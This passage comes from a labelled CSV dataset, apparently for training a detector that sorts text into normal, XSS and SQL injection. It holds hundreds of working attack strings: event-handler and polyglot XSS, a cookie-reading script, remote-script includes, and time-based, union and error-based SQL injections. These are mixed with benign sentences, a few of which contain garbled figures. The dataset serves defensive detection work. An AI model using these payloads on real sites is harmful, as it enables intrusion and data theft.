onanimationiteration=""alert(1)""></center>",1,XSS,1689 +"1%"" ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,18290 +1' ) ) ) and sleep ( 5 ) and ( ( ( 'hwjy' = 'hwjy,2,SQLi,14931 +<sub onpointerdown=alert(1)>XSS</sub>,1,XSS,8450 +"1"" ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""dksc"" = ""dksc",2,SQLi,15745 +"Just like Editions, only select partners are being brought on.",0,normal,25888 +"UNION select table_schema,table_name FROM information_Schema.tables;#",2,SQLi,9962 +</script></script><<<<script><>>>><<<script>alert(123)</script>,1,XSS,1271 +"<;A HREF="";http://1113982867/"";>;XSS<;/A>;",1,XSS,1605 +"<optgroup draggable=""true"" ondragleave=""alert(1)"">test</optgroup>",1,XSS,5245 +"<script>throw[onerror]=[alert],1</script>",1,XSS,138 +-4389' ) ) ) or ( 1139 = 3499 ) *3499 and ( ( ( 'qoch' = 'qoch,2,SQLi,21947 +"<td onbeforecut=""alert(1)"" contenteditable>test</td>",1,XSS,5334 +1' ) ) ) waitfor delay '0:0:5'--,2,SQLi,21337 +"1%"" ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12865 +I want to choose a theme for the party.,0,normal,23881 +<select onpointerenter=alert(1)>XSS</select>,1,XSS,3913 +Join the virtual meeting.,0,normal,22627 +Modify the privacy policy for compliance.,0,normal,22954 +ORDER BY 15,2,SQLi,10213 +"<shadow onmouseover=""alert(1)"">test</shadow>",1,XSS,5177 +"1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and 'ggcm' like 'ggcm",2,SQLi,19749 +<area onpointerover=alert(1)>XSS</area>,1,XSS,8571 +"1' ) as sjmt where 6541 = 6541 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,16008 +"<iframe draggable=""true"" ondragleave=""alert(1)"">test</iframe>",1,XSS,7812 +"-3953 ) as wjjk where 6433 = 6433 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,19461 +"-6656"" ) union all select 3931#",2,SQLi,15611 +"-9408%"" ) ) union all select 1841,1841,1841,1841,1841,1841--",2,SQLi,22266 +"1' ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( 'stqq' = 'stqq",2,SQLi,21661 +1' where 8099 = 8099,2,SQLi,14298 +Where's your SQL skill?,0,normal,23365 +<small onpointerup=alert(1)>XSS</small>,1,XSS,7704 +1 ) ) as ogcv where 4396 = 4396,2,SQLi,17256 +"<span onpaste=""alert(1)"" contenteditable>test</span>",1,XSS,6847 +"1"" ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ""zxks"" = ""zxks",2,SQLi,18961 +"1"" ) where 1330 = 1330 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --",2,SQLi,12221 +1' ) as yqld where 2489 = 2489,2,SQLi,21868 +"1' in boolean mode ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,15875 +-2316' ) ) ) or 8519 = 6010,2,SQLi,16976 +1 ) as iiku where 9466 = 9466,2,SQLi,20842 +1%' ) ) ) and 2444 = 9282#,2,SQLi,22131 +"<table onbeforecopy=""alert(1)"" contenteditable>test</table>",1,XSS,7276 +?,2,SQLi,10072 +or 'whatever' in ( 'whatever' ),2,SQLi,11680 +<form>,1,XSS,9120 +"<ul onkeydown=""alert(1)"" contenteditable>test</ul>",1,XSS,3121 +"1"" ) ) as frsd where 6475 = 6475 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,12507 +<font onpointermove=alert(1)>XSS</font>,1,XSS,8067 +select ( case when ( 7385 = 8723 ) then 7385 else 7385* ( select 7385 from information_schema.character_sets ) end ) #,2,SQLi,17255 +<pre onpointerout=alert(1)>XSS</pre>,1,XSS,6536 +"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'leps' like 'leps",2,SQLi,19376 +Where's the citadel?,0,normal,23541 +"1"" or sleep ( 5 ) and ""telb"" = ""telb",2,SQLi,16769 +[test](javascript://%0d%0aprompt(1);com),1,XSS,9367 +where,0,normal,26484 +select * from users where id = 1 % ( @ ) or 1 = 1 -- 1,2,SQLi,11559 +<BODY BACKGROUND=�javascript:alert(�XSS�)�>,1,XSS,1663 +1' ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( 'qiau' = 'qiau,2,SQLi,21895 +"<optgroup onmousemove=""alert(1)"">test</optgroup>",1,XSS,8411 +"1%"" and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ""%"" = """,2,SQLi,19333 +&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;,1,XSS,1505 +"<style onmouseover=""alert(1)"">test</style>",1,XSS,2695 +Delete the extra spaces.,0,normal,22538 +select case when 5433 = 6458 then 1 else null end--,2,SQLi,14879 +</script><script>alert('');</script>,1,XSS,6864 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#",2,SQLi,10595 +<option onfocusout=alert(1) tabindex=1 id=x></option><input autofocus>,1,XSS,7268 +"<multicol onpaste=""alert(1)"" contenteditable>test</multicol>",1,XSS,8110 +"1"" ) ) as ylah where 9248 = 9248",2,SQLi,18857 +1 ) ) ) and 6467 = 1864#,2,SQLi,13252 +select ( case when ( 8716 = 1338 ) then 1 else 8716* ( select 8716 from master..sysdatabases ) end ) --,2,SQLi,18366 +Where's the massage parlor?,0,normal,23585 +1' ) ) as xpmy where 5274 = 5274 rlike ( select ( case when ( 6252 = 7704 ) then 1 else 0x28 end ) ) --,2,SQLi,13476 +"<style>:target {color:red;}</style><colgroup id=x style=""transition:color 1s"" ontransitionend=alert(1)></colgroup>",1,XSS,8157 +Where's the taxi stand?,0,normal,23466 +select,0,normal,26553 +Select get.,0,normal,24527 +"-3205"" ) union all select 5233,5233,5233,5233#",2,SQLi,19058 +"1"" ) as xwnu where 6490 = 6490 union all select null,null,null,null,null,null--",2,SQLi,18652 +"<DIV STYLE=""background-image: url(&#1;javascript:alert('XSS'))"">",1,XSS,776 +"1%' ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( '%' = '",2,SQLi,14302 +1 ) where 6494 = 6494,2,SQLi,13590 +1' and ( select * from ( select ( sleep ( 5 ) ) ) fzno ),2,SQLi,19587 +<object onafterscriptexecute=confirm(0)>,1,XSS,9672 +-7041' ) where 6307 = 6307 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,22215 +I want to select a book for my collection.,0,normal,23832 +<shadow id=x tabindex=1 onbeforeactivate=alert(1)></shadow>,1,XSS,8451 +1'+ ( select 'lcru' where 3215 = 3215,2,SQLi,16951 +"<applet onmouseenter=""alert(1)"">test</applet>",1,XSS,6166 +"Get $100 off select PlayStation 4 consoles, $100-$150 off select Xbox One consoles, and a $49.993 gift coupon when you buy the Nintendo Switch.",0,normal,26107 +"1%"" and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ""%"" = """,2,SQLi,20642 +Up to 80% off select furniture and decor (through August 22).,0,normal,25168 +1 ) as nmlm where 9872 = 9872,2,SQLi,17746 +Where's the makeup artist?,0,normal,23609 +"1'+ ( select 'sbvh' where 8539 = 8539 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) +'",2,SQLi,12189 +1'|| ( select 'wszt' from dual where 6854 = 6854 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ) ||',2,SQLi,16868 +The Eurail Select Pass is the most flexible pass that allows you to choose countries to visit.,0,normal,25417 +"<a onpaste=""alert(1)"" contenteditable>test</a>",1,XSS,85 +"<a href=""\x0Djavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,506 +"1"" where 9973 = 9973 and 2006 = 2006",2,SQLi,14245 +<nobr id=x tabindex=1 onfocusin=alert(1)></nobr>,1,XSS,7554 +"<summary onmouseenter=""alert(1)"">test</summary>",1,XSS,3289 +"<plaintext onmouseout=""alert(1)"">test</plaintext>",1,XSS,2203 +-1549' ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 'fnwx' = 'fnwx,2,SQLi,17008 +<svg><dialog onload=alert(1)></dialog>,1,XSS,5626 +<button onCut=javascript:alert(1)>,1,XSS,9562 +1 ) ) as zldh where 3302 = 3302 rlike ( select ( case when ( 1481 = 5677 ) then 1 else 0x28 end ) ) --,2,SQLi,16229 +"I look forward to the definitive report Chairman Gowdy and the select Committee will present to the American people.” Gowdy's select committee held just one public hearing in the six months since the House voted to form the panel in May, and Boehner has long said that he expected the committee's work to last beyond the 113th Congress, which ends in January.",0,normal,26027 +I'll select the beat that's inspiring to me.,0,normal,25992 +1' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( 'xazf' = 'xazf,2,SQLi,20000 +"<style>@keyframes slidein {}</style><td style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></td>",1,XSS,7886 +"-5243"" where 2105 = 2105 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,12203 +1'+ ( select 'kcix' where 1117 = 1117,2,SQLi,18688 +<image id=x tabindex=1 onfocus=alert(1)></image>,1,XSS,5720 +"<IMG SRC=x onmousedown=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1154 +Where's the missing piece?,0,normal,22600 +"<div draggable=""true"" contenteditable>drag me</div><article ondrop=alert(1) contenteditable>drop here</article>",1,XSS,7176 +select ( case when ( 5464 = 9350 ) then 5464 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,18865 +"-9860%"" union all select 6996,6996,6996,6996,6996,6996#",2,SQLi,15427 +1' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( 'hgwt' like 'hgwt,2,SQLi,17543 +"`'><script>\x0Bjavascript:alert(1)</script> +`'><script>\x20javascript:alert(1)</script>",1,XSS,552 +<content onblur=alert(1) tabindex=1 id=x></content><input autofocus>,1,XSS,3662 +"`'><script>\xE2\x80\x89javascript:alert(508)</script> +`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>",1,XSS,8930 +"<aside onkeyup=""alert(1)"" contenteditable>test</aside>",1,XSS,8822 +Join the tour.,0,normal,22846 +-1300 ) as rrsm where 1086 = 1086 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,16005 +"1%"" ) ) ) union all select null,null,null#",2,SQLi,14002 +"<div onmouseup=""alert(1)"">test</div>",1,XSS,3853 +<body id=x tabindex=1 onbeforeactivate=alert(1)></body>,1,XSS,4344 +Select a design.,0,normal,24797 +&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;,1,XSS,1344 +-3862' ) or 9323 = 9323#,2,SQLi,16650 +"1' ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( 'drvk' like 'drvk",2,SQLi,15305 +"<h1 onmouseleave=""alert(1)"">test</h1>",1,XSS,3579 +"<bdi draggable=""true"" ondragleave=""alert(1)"">test</bdi>",1,XSS,8292 +"<style>@keyframes slidein {}</style><base style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></base>",1,XSS,4845 +select ( case when ( 9556 = 7122 ) then 9556 else 9556* ( select 9556 from information_schema.character_sets ) end ) #,2,SQLi,19156 +&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,1384 +"-7267 ) union all select 1912,1912,1912,1912,1912,1912,1912,1912--",2,SQLi,12651 +))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337,2,SQLi,11153 +"select * from users where id = 1 or 1#"". union select null,version ( ) -- 1",2,SQLi,11353 +"1 ) ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,16192 +"1"" ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,15467 +<bdi id=x tabindex=1 onbeforeactivate=alert(1)></bdi>,1,XSS,5475 +"<style>:target {color:red;}</style><p id=x style=""transition:color 1s"" ontransitionend=alert(1)></p>",1,XSS,2135 +"<style>@keyframes x{}</style><frameset style=""animation-name:x"" onanimationend=""alert(1)""></frameset>",1,XSS,7859 +Where did you spot that unique sculpture from?,0,normal,23668 +1' ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,20904 +"<a href=""\x03javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,479 +"</script><img/*/src=""worksinchrome&colon;prompt&#x28;1&#x29;""/*/onerror='eval(src)'>",1,XSS,1223 +<a id=x tabindex=1 onfocusin=alert(1)></a>,1,XSS,20 +admin' or ',2,SQLi,10012 +<form id=x tabindex=1 onactivate=alert(1)></form>,1,XSS,8511 +"1 union all select null,null--",2,SQLi,18776 +1'+ ( select 'upmd' where 3438 = 3438,2,SQLi,17423 +password:*/=1--,2,SQLi,11039 +"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""/bin/echo 'IPT SRC=http://xss.rocks/xss.js></SCRIPT>'""-->",1,XSS,287 +"<big draggable=""true"" ondragleave=""alert(1)"">test</big>",1,XSS,7403 +"1"" ) where 1416 = 1416 union all select null,null,null#",2,SQLi,17888 +Where's the perfect place to enjoy nature?,0,normal,23771 +ORDER BY 31337--,2,SQLi,10167 +"-7916' ) ) union all select 9299,9299,9299,9299,9299,9299,9299,9299,9299,9299#",2,SQLi,17993 +"<img oncut=""alert(1)"" contenteditable>test</img>",1,XSS,5166 +"1' ) where 1093 = 1093 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,15576 + or 3=3 --,2,SQLi,10092 +"1' ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( 'uadr' like 'uadr",2,SQLi,21916 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#",2,SQLi,10521 +"<progress onkeydown=""alert(1)"" contenteditable>test</progress>",1,XSS,4597 +"1 ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,21854 +Select a fragrance for your home.,0,normal,24200 +"<param onmouseover=""alert(1)"">test</param>",1,XSS,8490 +"<del onmousedown=""alert(1)"">test</del>",1,XSS,5663 +1 waitfor delay '0:0:5'-- nnnp,2,SQLi,14601 +end and ( ( 'zlsq' = 'zlsq,2,SQLi,17637 +-6792 ) ) as zlho where 4758 = 4758 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,18047 +"<option onmouseout=""alert(1)"">test</option>",1,XSS,6935 +"select * from users where id = 1 or "" ) ["" or 1 = 1 -- 1",2,SQLi,11741 +union all select @@version--,2,SQLi,10024 +"1 ) as rtpl where 1262 = 1262 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14100 +Select from options.,0,normal,22735 +<select id=x tabindex=1 onbeforeactivate=alert(1)></select>,1,XSS,8207 +"1"" where 3274 = 3274 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,19275 +top[/al/.source+/ert/.source](1),1,XSS,4305 +"<data oncopy=""alert(1)"" contenteditable>test</data>",1,XSS,6647 +"1"" ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( ""buwe"" = ""buwe",2,SQLi,21986 +"<del draggable=""true"" ondragenter=""alert(1)"">test</del>",1,XSS,5747 +Select your power.,0,normal,24838 +<slot onfocusout=alert(1) tabindex=1 id=x></slot><input autofocus>,1,XSS,4050 +<marquee id=x tabindex=1 onfocusin=alert(1)></marquee>,1,XSS,6544 +);waitfor delay '0:0:__TIME__'--,2,SQLi,10742 +1%' ) and sleep ( 5 ) #,2,SQLi,18017 +"<embed onclick=""alert(1)"">test</embed>",1,XSS,2163 +"1 ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,19808 +"1%"" or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,21742 +Select upgrade.,0,normal,24582 +"<applet oncut=""alert(1)"" contenteditable>test</applet>",1,XSS,1836 +<address id=x tabindex=1 onfocus=alert(1)></address>,1,XSS,4505 +1'+ ( select 'lpkv' where 8760 = 8760,2,SQLi,13382 +"<div draggable=""true"" contenteditable>drag me</div><slot ondragover=alert(1) contenteditable>drop here</slot>",1,XSS,2185 +"-7528' or make_set ( 3809 = 1821,1821 ) and 'kgch' = 'kgch",2,SQLi,14633 +<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>,1,XSS,42 +"1' and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19863 +"AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--",2,SQLi,11209 +"1 ) ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( 8738 = 8738",2,SQLi,13755 +"1%"" ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,14522 +sleep(5)#,2,SQLi,10244 +"-5417 or elt ( 1032 = 1032,3623 )",2,SQLi,13582 +1'|| ( select 'cclo' from dual where 6823 = 6823 and 9198 = 9198--,2,SQLi,12216 +"<div ondblclick=""alert(1)"">test</div>",1,XSS,3019 +"1%"" ) ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ( ""%"" = """,2,SQLi,19205 +"<style>@keyframes slidein {}</style><noembed style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></noembed>",1,XSS,3473 +"1%"" ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,12086 +"1 ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,19077 +"?javascript:alert(1)"",",1,XSS,9821 +select 'qqpjq'|| ( case 5118 when 5118 then 1 else 0 end ) ||'qzvzq' from rdb$database,2,SQLi,17063 +1'|| ( select 'owzs' where 1475 = 1475 union all select null--,2,SQLi,21415 +<svg onload=alert(1)>,1,XSS,7587 +"J. Crew: Take 5003 percent off select styles, through November 2127.",0,normal,25893 +Update your profile picture.,0,normal,22544 +Select a flavor for the drink.,0,normal,24130 +1 ) ) as uvep where 6016 = 6016 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,15766 +%3cscript%3ealert('XSS')%3c/script%3e,1,XSS,1643 +"1%' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( '%' = '",2,SQLi,18087 +"1%"" ) ) ) rlike ( select ( case when ( 4442 = 4476 ) then 1 else 0x28 end ) ) and ( ( ( ""%"" = """,2,SQLi,21784 +&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;,1,XSS,1039 +"AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337",2,SQLi,11230 +"-eval(window['pro'%2B'mpt'](8)"")-'",1,XSS,323 +Select a scenic spot.,0,normal,22697 +"<a href=""\x0Fjavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,469 +<track onpointerout=alert(1)>XSS</track>,1,XSS,6539 +<details id=x tabindex=1 onfocusin=alert(1)></details>,1,XSS,6511 +Select hike.,0,normal,24610 +or uname like '%,2,SQLi,9953 +Burr serves as chairman of the Senate Select Committee on Intelligence.,0,normal,26272 +"<option onmouseup=""alert(1)"">test</option>",1,XSS,5513 +<picture onpointerleave=alert(1)>XSS</picture>,1,XSS,4100 +"<html onmouseup=""alert(1)"">test</html>",1,XSS,5318 +1 ) and sleep ( 5 ) and ( 4855 = 4855,2,SQLi,16145 +"(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'""+(select(0)from(select(sleep(5)))v)+""*%2f",2,SQLi,11075 +"1 ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) )",2,SQLi,21671 +Select trace.,0,normal,24628 +"1' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 )",2,SQLi,18976 +"1"" rlike sleep ( 5 )",2,SQLi,15667 +<x%09onxxx=1,1,XSS,9306 +1' ) ) as iuta where 1482 = 1482,2,SQLi,13737 +"javascript:alert(1)//\"";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*""/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC=""javascript:alert(1);""></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)//",1,XSS,9484 +-8523 ) as hzqs where 8944 = 8944 order by 1--,2,SQLi,14788 +select ( case when ( 7169 = 7785 ) then 1 else 7169* ( select 7169 from master..sysdatabases ) end ) --,2,SQLi,18145 +"Investors seeking exposure to those sectors can get it through the Consumer Staples Select Sector SPDR Fund, the Vanguard Financials Index Fund, and the Utilities Select Sector SPDR Fund.",0,normal,25934 +"1, ( select ( case when ( 3717 = 3717 ) then 1 else 3717* ( select 3717 from master..sysdatabases ) end ) )",2,SQLi,18507 +"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,18286 +"<wbr onmousedown=""alert(1)"">test</wbr>",1,XSS,6528 +<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>,1,XSS,9241 +"<style type=""text/css"">BODY{background:url(""javascript:document.vulnerable=true"")}</style>",1,XSS,1454 +I'll select my shoes.,0,normal,24285 +Where's the park?,0,normal,23499 +"<image onpaste=""alert(1)"" contenteditable>test</image>",1,XSS,7342 +-5569' ) as cjaf where 3753 = 3753 union all select 3753#,2,SQLi,18716 +or 'text' > 't',2,SQLi,10053 +"<marquee onbeforepaste=""alert(1)"" contenteditable>test</marquee>",1,XSS,8806 +"( select * from generate_series ( 3906,3906,case when ( 3906 = 3906 ) then 1 else 0 end ) limit 1 )",2,SQLi,18616 +"1' ) where 7561 = 7561 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13049 +"<a href=""jAvAsCrIpT&colon;alert&lpar;1&rpar;"">X</a>",1,XSS,837 +"<del onmouseout=""alert(1)"">test</del>",1,XSS,6356 +<blockquote onfocusout=alert(1) tabindex=1 id=x></blockquote><input autofocus>,1,XSS,3195 +"<div draggable=""true"" contenteditable>drag me</div><source ondragover=alert(1) contenteditable>drop here</source>",1,XSS,5263 +"1 ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( 3872 = 3872",2,SQLi,21079 +I need to decide where to go for shopping.,0,normal,23923 +Randomly select a wedding favor.,0,normal,24371 +"end and ( ( ( ""zpii"" like ""zpii",2,SQLi,13745 +"<progress ondblclick=""alert(1)"">test</progress>",1,XSS,7306 +select * from users where id = 1 % ( \ ) or 1 = 1 -- 1,2,SQLi,11880 +"1%"" ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( ""%"" = """,2,SQLi,16026 +"<datalist onmousedown=""alert(1)"">test</datalist>",1,XSS,2151 +"1 ) where 8338 = 8338 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,18169 +"1"" ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""rkfk"" like ""rkfk",2,SQLi,18210 +"We need to reflect, select, revise, and edit, while moving forward.",0,normal,25138 +begin dbms_lock.sleep ( 5 ),2,SQLi,12832 +<script id=x tabindex=1 onfocusin=alert(1)></script>,1,XSS,7828 +1%' ) ) ) waitfor delay '0:0:5' and ( ( ( '%' = ',2,SQLi,15131 +<blink onpointerover=alert(1)>XSS</blink>,1,XSS,6804 +"1%"" ) and 8024 = 3560--",2,SQLi,12028 +Where's the primary key?,0,normal,23346 +"1"" ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ""dplf"" like ""dplf",2,SQLi,14228 +<option onblur=alert(1) tabindex=1 id=x></option><input autofocus>,1,XSS,8049 +"<script src=""http://code.jquery.com/jquery-1.4.4.js""></script>",1,XSS,9202 +"<STYLE TYPE=""text/javascript"">alert('');</STYLE>",1,XSS,8477 +"-6381%"" or 8571 = 8571--",2,SQLi,19107 +"<blink ondblclick=""alert(1)"">test</blink>",1,XSS,5437 +"<style>:target {transform: rotate(180deg);}</style><head id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></head>",1,XSS,5583 +"select * from users where id = '1' union select \.,@@VERSION -- 1'",2,SQLi,11828 +<big onblur=alert(1) tabindex=1 id=x></big><input autofocus>,1,XSS,8487 +"<track onkeydown=""alert(1)"" contenteditable>test</track>",1,XSS,2533 +1'+ ( select lptb where 3861 = 3861 or sleep ( 5 ) ) +',2,SQLi,20611 +1'|| ( select 'lxyu' from dual where 5789 = 5789 union all select null#,2,SQLi,22037 +"<style>:target {transform: rotate(180deg);}</style><div id=x style=""transition:transform 2s"" 